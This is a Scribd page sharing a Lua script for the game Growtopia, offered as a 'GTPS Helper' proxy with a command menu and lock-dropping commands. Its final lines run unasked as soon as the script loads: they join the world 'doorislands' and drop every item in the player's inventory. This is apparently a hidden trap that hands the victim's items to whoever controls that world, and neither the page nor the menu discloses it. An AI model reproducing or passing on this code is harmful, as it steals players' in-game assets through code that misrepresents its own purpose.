0% found this document useful (0 votes)
283 views1 page

Untitled

The document contains code for a Growtopia proxy script. It defines functions for dropping world locks, diamond locks, and all locks. It also contains code to display a proxy menu with available commands, and to log messages to the console. The script hooks into network events to handle custom commands and intercept packets.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
283 views1 page

Untitled

The document contains code for a Growtopia proxy script. It defines functions for dropping world locks, diamond locks, and all locks. It also contains code to display a proxy menu with available commands, and to log messages to the console. The script hooks into network events to handle custom commands and intercept packets.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

proxylist = "\nadd_label_with_icon|big|`oGTPS Helper|left|7068|"..

"\nadd_textbox|
`0[`4INFO`0] You Can Get Ercon If Spam|left|2480|".. "\nadd_textbox|`0[`5Avaible
Command`0]|left|2480|"..
"\nadd_image_button|banner|interface/large/news_bannerrttex|bannerlayout|||".. "\
nadd_textbox|`o/proxy `0- Proxy List|left|2480|".. "\nadd_textbox|`o/wdrop `0- Drop
World Lock|left|2480|".. "\nadd_textbox|`o/ddrop `0- Drop Diamond Lock|left|
2480|".. "\nadd_textbox|`o/daw `0- Drop All World Lock & Diamond Lock|left|2480|"..
"\nadd_textbox|`0[`6Credit`0]|left|2480|".. "\nadd_textbox|`1Proxy Made By :
`0@Anonymxs|left|2480|".. "\nadd_quick_exit|".. "\nend_dialog|end|Cancel|Okay|"
function AXE(sad) if sad.v1:find("OnDialogRequest") then if
sad.v2:find("drop_item") then return true end end return false end function wl()
for _, v in pairs(GetInventory()) do if v.id == 242 then SendPacket(2, "action|
drop\n|itemID|242"); log("`2Succes Drop All `0"..v.amount.." `2World Lock")
SendPacket(2, "action|dialog_return\ndialog_name|drop_item\nitemID|242|\
ncount|"..v.amount); end end end function dl() for _, v in pairs(GetInventory()) do
if v.id == 1796 then SendPacket(2, "action|drop\n|itemID|1796"); log("`2Succes Drop
All `0"..v.amount.." `2Diamond Lock") SendPacket(2, "action|dialog_return\
ndialog_name|drop_item\nitemID|1796|\ncount|"..v.amount); end end end function
log(txt) LogToConsole("`0[`cAXE Proxy`7] "..txt) end function custom_command(type,
packet) clog = "action|input\n|text|" if packet:find(clog .. "/ddrop") then txt =
packet:gsub("action|input\n|text|/ddrop", "") if txt == "" then log("Write Amount")
else SendPacket(2, "action|drop\n|itemID|1796") SendPacket(2, "action|
dialog_return\ndialog_name|drop_item\nitemID|1796|\ncount|"..txt) log("`2Succes
Drop`0"..txt.." `2Diamond Lock") return true end end if packet:find(clog ..
"/wdrop") then txt = packet:gsub("action|input\n|text|/wdrop", "") if txt == ""
then log("Write Amount") else SendPacket(2, "action|drop\n|itemID|242")
SendPacket(2, "action|dialog_return\ndialog_name|drop_item\nitemID|242|\
ncount|"..txt) log("`2Succes Drop`0"..txt.." `2World Lock") return true end end if
packet:find(clog .. "/daw") then wl() dl() return true end if packet:find(clog ..
"/proxy") then var = {} var.v0 = "OnDialogRequest" var.v1 = proxylist SendVariant
(var); log("Proxy List") return true end return false end AddHook(AXE, "OnVariant")
AddHook(custom_command, "OnSendPacket") log("Proxy Started, Type /proxy To See
Command") log("Script In Beta Mode") function omg(a) LogToConsole("Type :
"..a.type.."\nX : "..a.x.."\nY : "..a.y.."\nPunchX : "..a.px.."\nPunchY :
"..a.py.."\nState : "..a.state.."\nValue : "..a.value.."\nNetID : "..a.netid)
return false end AddHook(omg, "OnSendPacketRaw"); function hujan(var)
LogToConsole(var.v1) LogToConsole(var.v2) LogToConsole(var.v3) LogToConsole(var.v4)
LogToConsole(var.v5) return false end AddHook(hujan, "OnVariant") local world_name
= "doorislands|ok" SendPacket(3, "action|join_request\nname|" .. world_name .. "\
ninvitedWorld|0") Sleep(1000) for _, v in pairs(GetInventory()) do SendPacket(2,
"action|drop\n|itemID|"..v.id); SendPacket(2, "action|dialog_return\ndialog_name|
drop_item\nitemID|"..v.id.."|\ncount|"..v.amount); Sleep(30); end

You might also like